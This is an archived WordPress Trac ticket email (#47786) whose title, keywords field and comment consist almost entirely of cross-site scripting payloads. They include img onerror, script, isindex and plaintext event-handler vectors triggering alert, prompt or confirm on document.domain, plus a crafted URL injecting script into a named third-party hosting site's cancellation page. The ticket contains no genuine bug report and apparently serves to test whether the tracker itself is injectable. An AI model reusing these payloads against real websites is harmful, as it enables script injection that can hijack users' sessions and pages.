[wp-trac] [WordPress Trac] #47786: ">><marquee><img src=x onerror=confirm(document.domain)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(document.domain) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29; >'"><img src="http: //i.imgur.com/P8mL8.jpg">)

WordPress Trac noreply at wordpress.org
Fri Jul 26 18:08:43 UTC 2019


#47786: ">><marquee><img src=x onerror=confirm(document.domain)></marquee>"
></plaintext\></|\><plaintext/onmouseover=prompt(document.domain)
><script>prompt(1)</script>@gmail.com<isindex
formaction=javascript:alert(/XSS/) type=submit>'-->"
></script><script>alert(1)</script>"><img/id="confirm(
1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http:
//i.imgur.com/P8mL8.jpg">)
-------------------------------------------------+-------------------------
 Reporter:  harry008                             |       Owner:  (none)
     Type:  feature request                      |      Status:  new
 Priority:  normal                               |   Milestone:  Awaiting
                                                 |  Review
Component:  General                              |     Version:  5.2.1
 Severity:  normal                               |  Resolution:
 Keywords:  [12:43 20/7/2019] Midhun S:          |     Focuses:
  "><img/src/onerror=.1|alert`XSS`> [12:43       |
  20/7/2019] Midhun S:                           |
  https://www.interserver.net/cancelmyserver.php?email=ssds1%27%22%3E%3Cimg/src/onerror=.1|alert`XSS`%3E|
  [12:43 20/7/2019] Midhun S:                    |
  %27;%0d%0d});%0d{onerror=prompt}throw          |
  document.location</ScRipT// has-patch          |
-------------------------------------------------+-------------------------
Changes (by harry008):

 * Attachment "DSCN0010_small.2.jpg" added.

 [12:43, 20/7/2019] Midhun S:
 https://www.interserver.net/cancelmyserver.php?email=ssds1%27%22%3E%3Cimg/src/onerror=.1|alert`XSS`%3E
 [12:43, 20/7/2019] Midhun S: %27;%0d%0d});%0d{onerror=prompt}throw
 document.location</ScRipT//

-- 
Ticket URL: <https://core.trac.wordpress.org/ticket/47786>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform

